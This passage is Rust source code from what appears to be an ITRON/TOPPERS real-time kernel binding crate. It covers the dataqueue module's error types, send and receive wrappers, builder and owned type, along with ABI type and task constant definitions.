            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`DataqueueRef::recv_timeout`].
    pub enum RecvTimeoutError {
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        #[cfg(not(feature = "none"))]
        BadId,
        // `cfg(any())` never matches; kept for kernels with access
        // protection.
        #[cfg(any())]
        AccessDenied,
        #[cfg(not(feature = "none"))]
        Timeout,
        #[cfg(not(feature = "none"))]
        Released,
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        #[cfg(all(not(feature = "none"), feature = "dcre"))]
        Deleted,
    }
}
// Translate raw kernel error codes into `RecvTimeoutError` variants;
// unlisted codes yield `None`.
impl ErrorKind for RecvTimeoutError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // E_PAR is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            // Both "invalid ID" and "object does not exist" map to `BadId`.
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "dcre"))]
            abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`DataqueueRef::try_recv`].
    pub enum TryRecvError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        // `cfg(any())` never matches; kept for kernels with access
        // protection.
        #[cfg(any())]
        AccessDenied,
        /// `E_TMOUT` from a polling receive indicates a polling failure
        /// rather than an elapsed timeout.
        #[cfg(not(feature = "none"))]
        Timeout,
    }
}
// Translate raw kernel error codes into `TryRecvError` variants; unlisted
// codes yield `None`.
impl ErrorKind for TryRecvError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`DataqueueRef::initialize`].
    pub enum InitializeError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        // `cfg(any())` never matches; kept for kernels with access
        // protection.
        #[cfg(any())]
        AccessDenied,
    }
}
// Translate raw kernel error codes into `InitializeError` variants;
// unlisted codes yield `None`.
impl ErrorKind for InitializeError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`DataqueueRef::info`].
    pub enum InfoError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        // `cfg(any())` never matches; kept for kernels with access
        // protection.
        #[cfg(any())]
        AccessDenied,
    }
}
// Translate raw kernel error codes into `InfoError` variants; unlisted
// codes yield `None`.
impl ErrorKind for InfoError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`Dataqueue::build`].
    #[cfg(feature = "dcre")]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub enum BuildError {
        #[cfg(not(feature = "none"))]
        BadContext,
        // `cfg(any())` never matches; kept for kernels with access
        // protection.
        #[cfg(any())]
        AccessDenied,
        /// Ran out of memory or dataqueue IDs, or the specified capacity
        /// does not fit in `uint_t`.
        #[cfg(not(feature = "none"))]
        OutOfMemory,
        /// Bad parameter.
        #[cfg(not(feature = "none"))]
        BadParam,
    }
}
// Translate raw kernel error codes into `BuildError` variants; unlisted
// codes yield `None`.
#[cfg(feature = "dcre")]
impl ErrorKind for BuildError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        // `E_MACV` is considered critical, hence excluded
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            // Both "no ID available" and "out of memory" map to
            // `OutOfMemory`.
            #[cfg(not(feature = "none"))]
            abi::E_NOID | abi::E_NOMEM => Some(Self::OutOfMemory(Kind::from_error_code(code))),
            // Both "parameter error" and "reserved attribute" map to
            // `BadParam`.
            #[cfg(not(feature = "none"))]
            abi::E_PAR | abi::E_RSATR => Some(Self::BadParam(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`DataqueueRef::delete`].
    #[cfg(feature = "dcre")]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub enum DeleteError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        // `cfg(any())` never matches; kept for kernels with access
        // protection.
        #[cfg(any())]
        AccessDenied,
        #[cfg(not(feature = "none"))]
        BadState,
    }
}
// Translate raw kernel error codes into `DeleteError` variants; unlisted
// codes yield `None`.
#[cfg(feature = "dcre")]
impl ErrorKind for DeleteError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            // `E_OBJ` indicates an object state that forbids deletion.
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
/// The unit of data that can be sent through a dataqueue.
///
/// # Rationale
///
/// Although the data element type used by the kernel API is signed, in Rust,
/// unsigned integer types are preferred to represent raw data.
// NOTE(review): assumed to have the same width as the kernel's data element
// type — confirm against the `abi` definitions.
pub type DataElement = usize;
/// Dataqueue information returned by [`DataqueueRef::info`].
#[derive(Debug, Clone, Copy)]
pub struct Info {
#[cfg(not(feature = "none"))]
raw: abi::T_RDTQ,
}
impl Info {
    /// Get the number of data items contained in the dataqueue.
    #[inline]
    pub fn len(&self) -> usize {
        match () {
            // Since `sdtqcnt` represents a number of objects in memory, the
            // conversion should not cause an overflow
            #[cfg(not(feature = "none"))]
            () => self.raw.sdtqcnt as usize,
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// Get a flag indicating whether the dataqueue is empty.
    #[inline]
    pub fn is_empty(&self) -> bool {
        self.len() == 0
    }
    /// Get the first waiting sender's task ID.
    ///
    /// Returns `None` if no task is waiting to send.
    #[inline]
    pub fn first_waiting_sending_task_id(&self) -> Option<abi::NonNullID> {
        match () {
            // `stskid` is zero (`TSK_NONE`) when no task is waiting, which
            // `NonNullID::new` maps to `None`.
            #[cfg(not(feature = "none"))]
            () => abi::NonNullID::new(self.raw.stskid),
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// Get the first waiting receiver's task ID.
    ///
    /// Returns `None` if no task is waiting to receive.
    #[inline]
    pub fn first_waiting_receiving_task_id(&self) -> Option<abi::NonNullID> {
        match () {
            #[cfg(not(feature = "none"))]
            () => abi::NonNullID::new(self.raw.rtskid),
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
/// A borrowed reference to a dataqueue.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct DataqueueRef<'a> {
    // Raw kernel object ID; non-null by construction.
    id: abi::NonNullID,
    // Ties this reference to whatever guarantees the dataqueue stays alive.
    _phantom: PhantomData<&'a ()>,
}
impl fmt::Debug for DataqueueRef<'_> {
    /// Formats the reference as `Dataqueue(<raw id>)`.
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        f.write_fmt(format_args!("Dataqueue({})", self.id.get()))
    }
}
/// # Object ID conversion
impl DataqueueRef<'_> {
    /// Construct a `DataqueueRef` from a raw object ID.
    ///
    /// # Safety
    ///
    /// See [Object ID Wrappers](crate#object-id-wrappers).
    #[inline]
    pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
        Self {
            id,
            _phantom: PhantomData,
        }
    }
    /// Get the raw object ID.
    #[inline]
    pub const fn as_raw(self) -> abi::ID {
        self.id.get()
    }
    /// Get the raw object ID as [`abi::NonNullID`].
    #[inline]
    pub const fn as_raw_nonnull(self) -> abi::NonNullID {
        self.id
    }
}
/// # Management
impl DataqueueRef<'_> {
    /// `del_dtq`: Delete the dataqueue.
    ///
    /// # Safety
    ///
    /// See [Object ID Wrappers](crate#object-id-wrappers).
    #[inline]
    #[doc(alias = "del_dtq")]
    #[cfg(feature = "dcre")]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub unsafe fn delete(self) -> Result<(), Error<DeleteError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::del_dtq(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `ref_dtq`: Get the dataqueue's general information.
    #[inline]
    #[doc(alias = "ref_dtq")]
    pub fn info(self) -> Result<Info, Error<InfoError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                // NOTE(review): `pri` holds a `T_RDTQ`, not a priority; the
                // name looks like a copy-paste leftover from another module.
                let mut pri = MaybeUninit::uninit();
                Error::err_if_negative(abi::ref_dtq(self.as_raw(), pri.as_mut_ptr()))?;
                // On success the kernel has filled in the output structure.
                Ok(Info {
                    raw: pri.assume_init(),
                })
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
/// # Dataqueue Operations
impl DataqueueRef<'_> {
    /// `snd_dtq`: Send a data element to the dataqueue. Blocks the current task
    /// if the dataqueue is full.
    #[inline]
    #[doc(alias = "snd_dtq")]
    pub fn send(self, data_element: DataElement) -> Result<(), Error<SendError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                // The kernel ABI takes a signed element; the `as` cast
                // preserves the bit pattern.
                Error::err_if_negative(abi::snd_dtq(self.as_raw(), data_element as isize))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `tsnd_dtq`: Send a data element to the dataqueue. Blocks the current
    /// task with timeout if the dataqueue is full.
    #[inline]
    #[doc(alias = "tsnd_dtq")]
    pub fn send_timeout(
        self,
        data_element: DataElement,
        tmo: Timeout,
    ) -> Result<(), Error<SendTimeoutError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::tsnd_dtq(
                    self.as_raw(),
                    data_element as isize,
                    tmo.as_raw(),
                ))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `psnd_dtq`: Send a data element to the dataqueue. Fails and returns an
    /// error if the dataqueue is full.
    #[inline]
    #[doc(alias = "psnd_dtq")]
    pub fn try_send(self, data_element: DataElement) -> Result<(), Error<TrySendError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::psnd_dtq(self.as_raw(), data_element as isize))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `fsnd_dtq`: Send a data element to the dataqueue. Removes ("pushes out")
    /// the oldest element if the dataqueue is full.
    #[inline]
    #[doc(alias = "fsnd_dtq")]
    pub fn send_forced(self, data_element: DataElement) -> Result<(), Error<SendForcedError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::fsnd_dtq(self.as_raw(), data_element as isize))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `rcv_dtq`: Receive a data element from the dataqueue. Blocks the current
    /// task if the dataqueue is empty.
    ///
    /// # Rationale
    ///
    /// This method is named `recv` instead of `receive` following the suit of
    /// `std::sync::mpsc::Receiver::recv` and `std::net::UdpSocket::recv`.
    #[inline]
    #[doc(alias = "rcv_dtq")]
    pub fn recv(self) -> Result<DataElement, Error<RecvError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                let mut out = MaybeUninit::<isize>::uninit();
                Error::err_if_negative(abi::rcv_dtq(self.as_raw(), out.as_mut_ptr()))?;
                // On success the kernel has written the received element.
                Ok(out.assume_init() as usize)
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `trcv_dtq`: Receive a data element from the dataqueue. Blocks the
    /// current task with timeout if the dataqueue is empty.
    #[inline]
    #[doc(alias = "trcv_dtq")]
    pub fn recv_timeout(self, tmo: Timeout) -> Result<DataElement, Error<RecvTimeoutError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                let mut out = MaybeUninit::<isize>::uninit();
                Error::err_if_negative(abi::trcv_dtq(
                    self.as_raw(),
                    out.as_mut_ptr(),
                    tmo.as_raw(),
                ))?;
                Ok(out.assume_init() as usize)
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `prcv_dtq`: Receive a data element from the dataqueue. Fails and
    /// returns an error if the dataqueue is empty.
    #[inline]
    #[doc(alias = "prcv_dtq")]
    pub fn try_recv(self) -> Result<DataElement, Error<TryRecvError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                let mut out = MaybeUninit::<isize>::uninit();
                Error::err_if_negative(abi::prcv_dtq(self.as_raw(), out.as_mut_ptr()))?;
                Ok(out.assume_init() as usize)
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `ini_dtq`: Initialize the dataqueue.
    #[inline]
    #[doc(alias = "ini_dtq")]
    pub fn initialize(self) -> Result<(), Error<InitializeError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                // FIX: this previously called `abi::ini_sem` (the semaphore
                // initialization service call, apparently copied from the
                // semaphore module); a dataqueue must be initialized with
                // `ini_dtq`.
                Error::err_if_negative(abi::ini_dtq(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
#[cfg(feature = "dcre")]
pub use self::owned::*;
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
mod owned {
use super::*;
use crate::wait::QueueOrder;
use core::convert::TryInto;
/// The builder type for [dataqueues](Dataqueue). Created by [`Dataqueue::build`].
///
/// Its generic parameters are an implementation detail.
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
#[must_use = "`Builder` creates nothing unless you call `.finish()`"]
pub struct Builder<Capacity> {
    // Type-state marker: `__capacity_is_not_specified__` until
    // `Builder::capacity` is called, then `()`.
    #[allow(dead_code)]
    capacity: Capacity,
    // Set when the requested capacity did not fit in the ABI count type;
    // reported from `finish` rather than from `capacity`.
    capacity_overflow: bool,
    #[cfg(not(feature = "none"))]
    raw: abi::T_CDTQ,
}
/// Builder field hole types
#[allow(non_camel_case_types)]
#[doc(hidden)]
pub mod builder_hole {
    /// Marker type indicating that `Builder::capacity` has not been called yet.
    pub struct __capacity_is_not_specified__;
}
impl Dataqueue {
    /// `acre_dtq`: Create a builder for `Dataqueue`.
    ///
    /// # Examples
    ///
    /// ```rust,no_run
    /// use itron::dataqueue::Dataqueue;
    /// let dataqueue = Dataqueue::build()
    ///     .capacity(2)
    ///     .finish()
    ///     .expect("failed to create a dataqueue");
    ///
    /// dataqueue.as_ref().send(1)
    ///     .expect("failed to send a data element");
    /// dataqueue.as_ref().send(2)
    ///     .expect("failed to send a data element");
    /// dataqueue.as_ref().try_send(3)
    ///     .expect_err("unexpectedly succeeded to send a data element");
    /// ```
    #[inline]
    #[doc(alias = "acre_dtq")]
    pub fn build() -> Builder<builder_hole::__capacity_is_not_specified__> {
        Builder {
            capacity: builder_hole::__capacity_is_not_specified__,
            capacity_overflow: false,
            #[cfg(not(feature = "none"))]
            raw: abi::T_CDTQ {
                // Default attributes (FIFO queue order; see `queue_order`)
                dtqatr: abi::TA_NULL,
                dtqcnt: 0,
                // Null pointer: let the kernel allocate the management area
                dtqmb: core::ptr::null_mut(),
            },
        }
    }
}
// TODO: abi::T_CDTQ::dtqmb
impl<Capacity> Builder<Capacity> {
    /// (**Mandatory**) Specify the dataqueue's capacity, measured in
    /// number of data elements.
    ///
    /// If `value` does not fit in the ABI count type, the overflow is
    /// remembered and reported by [`Builder::finish`] instead of here.
    #[inline]
    pub fn capacity(self, value: usize) -> Builder<()> {
        let (capacity, capacity_overflow) = match value.try_into() {
            Ok(x) => (x, false),
            Err(_) => (0, true),
        };
        Builder {
            // FIXME: Use the struct update syntax when rust-lang/rfcs#2528
            // is implemented
            capacity: (),
            capacity_overflow,
            #[cfg(not(feature = "none"))]
            raw: abi::T_CDTQ {
                dtqcnt: capacity,
                ..self.raw
            },
        }
    }
    /// Specify the queue order. Defaults to `Fifo` when unspecified.
    #[inline]
    pub fn queue_order(self, value: QueueOrder) -> Self {
        Builder {
            #[cfg(not(feature = "none"))]
            raw: abi::T_CDTQ {
                dtqatr: value.as_raw_atr(),
                ..self.raw
            },
            ..self
        }
    }
}
impl Builder<()> {
    /// Create a dataqueue using the specified parameters.
    ///
    /// Returns an `OutOfMemory` error if the capacity passed to
    /// [`Builder::capacity`] overflowed the ABI count type.
    #[allow(unused_mut)]
    pub fn finish(mut self) -> Result<Dataqueue, Error<BuildError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                if self.capacity_overflow {
                    // Safety: `E_NOMEM` is handled by `BuildError`
                    // (Warning: This is not true for `cfg(feature = "none")`.)
                    return Err(Error::new_unchecked(ErrorCode::new_unchecked(abi::E_NOMEM)));
                }
                let id = Error::err_if_negative(abi::acre_dtq(&self.raw))?;
                // Safety: We own the dataqueue we create
                Ok(Dataqueue::from_raw_nonnull(abi::NonNullID::new_unchecked(
                    id,
                )))
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
/// An owned dataqueue.
///
/// [Deletes] the dataqueue automatically when dropped. The destructor will
/// panic if the deletion fails.
///
/// [Deletes]: DataqueueRef::delete
#[derive(PartialEq, Eq)]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub struct Dataqueue(DataqueueRef<'static>);
impl fmt::Debug for Dataqueue {
    #[inline]
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        // Delegate to `DataqueueRef`'s representation.
        self.0.fmt(f)
    }
}
impl Drop for Dataqueue {
    #[inline]
    fn drop(&mut self) {
        // Safety: we own the ID, so the dataqueue still exists here.
        unsafe { self.0.delete().unwrap() };
    }
}
impl Dataqueue {
    /// Construct a `Dataqueue` from a raw object ID.
    ///
    /// # Safety
    ///
    /// See [Object ID Wrappers](crate#object-id-wrappers).
    #[inline]
    pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
        Self(unsafe { DataqueueRef::from_raw_nonnull(id) })
    }
    /// Consume and "leak" `self`, returning a reference `DataqueueRef<'a>`.
    ///
    /// The dataqueue will no longer be deleted automatically.
    #[inline]
    pub const fn leak<'a>(self) -> DataqueueRef<'a> {
        let out = self.0;
        // Skip the destructor so the dataqueue is not deleted
        core::mem::forget(self);
        out
    }
    /// Get the raw object ID.
    #[inline]
    pub const fn as_raw(&self) -> abi::ID {
        self.0.as_raw()
    }
    /// Get the raw object ID as [`abi::NonNullID`].
    #[inline]
    pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
        self.0.as_raw_nonnull()
    }
    /// Borrow `Dataqueue` as [`DataqueueRef`].
    ///
    /// Use this to perform operations on dataqueues because most of the
    /// methods are implemented on `DataqueueRef` but not `Dataqueue`.
    #[inline]
    pub const fn as_ref(&self) -> DataqueueRef<'_> {
        self.0
    }
}
}
<file_sep>/src/abi/types.rs
//! Provides basic data type definitions and constants.
//!
//! Types that can be unambiguously mapped to Rust types, such as `int32_t`
//! but not `int_t`, should not have type aliases to minimize the maintenance
//! efforts.
/// Signed integer of the natural size
pub type int_t = i32;
/// Unsigned integer of the natural size
pub type uint_t = u32;
/// Boolean value (`TRUE`/`FALSE`)
pub type bool_t = int_t;
/// Represents a truthy value.
pub const TRUE: bool_t = 1;
/// Represents a falsy value.
pub const FALSE: bool_t = 0;
/// Function code
pub type FN = int_t;
/// Error code
pub type ER = int_t;
/// Non-zero version of [`ER`]
pub type NonZeroER = core::num::NonZeroI32;
/// Object ID number
pub type ID = int_t;
/// Non-null version of [`ID`]
pub type NonNullID = core::num::NonZeroI32;
/// Object attribute
pub type ATR = uint_t;
/// Object state
pub type STAT = uint_t;
/// Service call operating mode
pub type MODE = uint_t;
/// Priority
pub type PRI = int_t;
/// Timeout specification
pub type TMO = u32;
/// Extended information
pub type EXINF = core::mem::MaybeUninit<isize>;
/// Relative time
pub type RELTIM = u32;
// Assuming `defined(UINT64_MAX)`
/// System time
pub type SYSTIM = u64;
// Assuming `USE_64BIT_HRTCNT`
/// Count value of the high-resolution timer
pub type HRTCNT = u64;
#[cfg(all(feature = "asp3", feature = "ovrhdr"))]
/// Processor time [NGKI0573]
pub type PRCTIM = u32;
/// Start address of a program
pub type FP = unsafe fn();
/// Error code or boolean value
pub type ER_BOOL = int_t;
/// Error code or ID number
pub type ER_ID = int_t;
/// Error code or unsigned integer
pub type ER_UINT = int_t;
/// Data type used to allocate a management area
pub type MB_T = usize;
/// Access permission pattern
pub type ACPTN = u32;
/// Access permission vector
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct acvct {
    /// Access permission pattern for normal operation 1
    pub acptn1: ACPTN,
    /// Access permission pattern for normal operation 2
    pub acptn2: ACPTN,
    /// Access permission pattern for management operations
    pub acptn3: ACPTN,
    /// Access permission pattern for reference (read) operations
    pub acptn4: ACPTN,
}
/// Eventflag bit pattern
pub type FLGPTN = uint_t;
/// Interrupt number
pub type INTNO = uint_t;
/// Interrupt handler number
pub type INHNO = uint_t;
/// CPU exception handler number
pub type EXCNO = uint_t;
/// Type used to allocate a fixed-size memory pool area
pub type MPF_T = isize;
/*
 * Object attributes
 */
/// Specifies no object attributes
pub const TA_NULL: ATR = 0;
/*
 * Timeout specification
 */
/// Polling
pub const TMO_POL: TMO = 0;
/// Wait forever
pub const TMO_FEVR: TMO = TMO::MAX;
/// Non-blocking
pub const TMO_NBLK: TMO = TMO::MAX - 1;
/// Maximum value that can be specified as a relative time (`RELTIM`)
/// [NGKI0551]
///
/// Up to 66 minutes and 40 seconds can be specified.
pub const TMAX_RELTIM: TMO = 4_000_000_000;
/*
 * Access permission patterns
 */
/// Allow access only from the kernel domain
pub const TACP_KERNEL: ACPTN = 0;
/// Allow access from all domains
pub const TACP_SHARED: ACPTN = !0;
<file_sep>/src/abi/task.rs
use super::{bool_t, uint_t, ATR, ER, ER_ID, ER_UINT, EXINF, ID, PRI, RELTIM, STAT, TMO};
/*
 * Processing unit type definitions
 */
pub type TASK = Option<unsafe extern "C" fn(EXINF)>;
/*
 * Object attribute definitions
 */
/// Create the task in the activated state
pub const TA_ACT: ATR = 0x01;
/// Do not queue activation requests
pub const TA_NOACTQUE: ATR = 0x02;
#[cfg(all(feature = "asp3", feature = "rstr_task"))]
/// Restricted task
pub const TA_RSTR: ATR = 0x04;
/*
 * Object state definitions
 */
/// Running state
pub const TTS_RUN: STAT = 0x01;
/// Ready state
pub const TTS_RDY: STAT = 0x02;
/// Waiting state
pub const TTS_WAI: STAT = 0x04;
/// Suspended state
pub const TTS_SUS: STAT = 0x08;
/// Waiting-suspended (double wait) state
pub const TTS_WAS: STAT = 0x0c;
/// Dormant state
pub const TTS_DMT: STAT = 0x10;
/// Waiting for wakeup
pub const TTW_SLP: STAT = 0x0001;
/// Waiting for elapse of time (delay)
pub const TTW_DLY: STAT = 0x0002;
/// Waiting to acquire a semaphore resource
pub const TTW_SEM: STAT = 0x0004;
/// Waiting on an eventflag
pub const TTW_FLG: STAT = 0x0008;
/// Waiting to send to a dataqueue
pub const TTW_SDTQ: STAT = 0x0010;
/// Waiting to receive from a dataqueue
pub const TTW_RDTQ: STAT = 0x0020;
/// Waiting to send to a priority dataqueue
pub const TTW_SPDQ: STAT = 0x0100;
/// Waiting to receive from a priority dataqueue
pub const TTW_RPDQ: STAT = 0x0200;
#[cfg(any(
    all(feature = "asp3", feature = "messagebuf"),
    all(feature = "solid_asp3", feature = "messagebuf")
))]
/// Waiting to send to a message buffer
pub const TTW_SMBF: STAT = 0x0400;
#[cfg(any(
    all(feature = "asp3", feature = "messagebuf"),
    all(feature = "solid_asp3", feature = "messagebuf")
))]
/// Waiting to receive from a message buffer
pub const TTW_RMBF: STAT = 0x0800;
/// Waiting to lock a mutex
pub const TTW_MTX: STAT = 0x0080;
/// Waiting to acquire a fixed-size memory block
pub const TTW_MPF: STAT = 0x2000;
/*
 * Other constant definitions
 */
/// Specifies the calling task itself
pub const TSK_SELF: ID = 0;
/// There is no applicable task
pub const TSK_NONE: ID = 0;
/// The base priority of the calling task
pub const TPRI_SELF: PRI = 0;
/// The task's priority at activation time
pub const TPRI_INI: PRI = 0;
/// TOPPERS/ASP3 dynamic creation extension `T_CTSK`
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy)]
#[repr(C)]
pub struct T_CTSK {
    /// Task attributes
    pub tskatr: ATR,
    /// Extended information for the task
    pub exinf: EXINF,
    /// Start address of the task's main routine
    pub task: TASK,
    /// The task's priority at activation time
    pub itskpri: PRI,
    /// Size of the task's stack area
    pub stksz: usize,
    /// Start address of the task's stack area
    pub stk: *mut u8,
}
/// SOLID/FMP3 extension
#[cfg(all(feature = "solid_fmp3", feature = "dcre"))]
#[derive(Debug, Clone, Copy)]
#[repr(C)]
pub struct T_CTSK {
    /// Task attributes
    pub tskatr: ATR,
    /// Extended information for the task
    pub exinf: EXINF,
    /// Start address of the task's main routine
    pub task: TASK,
    /// The task's priority at activation time
    pub itskpri: PRI,
    /// Size of the task's stack area
    pub stksz: usize,
    /// Start address of the task's stack area
    pub stk: *mut u8,
    /// The task's initially assigned processor
    pub iprcid: ID,
    /// The set of processors the task may be assigned to
    pub affinity: uint_t,
}
/// TOPPERS/ASP3 `T_RTSK`
#[cfg(any(feature = "asp3", feature = "solid_asp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RTSK {
    /// Task state
    pub tskstat: STAT,
    /// The task's current priority
    pub tskpri: PRI,
    /// The task's base priority
    pub tskbpri: PRI,
    /// Reason for waiting
    pub tskwait: STAT,
    /// ID of the object the task is waiting on
    pub wobjid: ID,
    /// Time remaining until timeout
    pub lefttmo: TMO,
    /// Number of queued activation requests
    pub actcnt: uint_t,
    /// Number of queued wakeup requests
    pub wupcnt: uint_t,
    /// Task termination request state
    pub raster: bool_t,
    /// Task termination disabled state
    pub dister: bool_t,
}
/// TOPPERS/FMP3 `T_RTSK`
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RTSK {
    /// Task state
    pub tskstat: STAT,
    /// The task's current priority
    pub tskpri: PRI,
    /// The task's base priority
    pub tskbpri: PRI,
    /// Reason for waiting
    pub tskwait: STAT,
    /// ID of the object the task is waiting on
    pub wobjid: ID,
    /// Time remaining until timeout
    pub lefttmo: TMO,
    /// Number of queued activation requests
    pub actcnt: uint_t,
    /// Number of queued wakeup requests
    pub wupcnt: uint_t,
    /// Task termination request state
    pub raster: bool_t,
    /// Task termination disabled state
    pub dister: bool_t,
    /// ID of the processor the task is assigned to
    pub prcid: ID,
    /// Processor the task will be assigned to at its next activation
    pub actprc: ID,
}
/// Task management functions
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
extern "C" {
    pub fn act_tsk(tskid: ID) -> ER;
    pub fn can_act(tskid: ID) -> ER_UINT;
    pub fn get_tst(tskid: ID, p_tskstat: *mut STAT) -> ER;
    pub fn chg_pri(tskid: ID, tskpri: PRI) -> ER;
    pub fn get_pri(tskid: ID, p_tskpri: *mut PRI) -> ER;
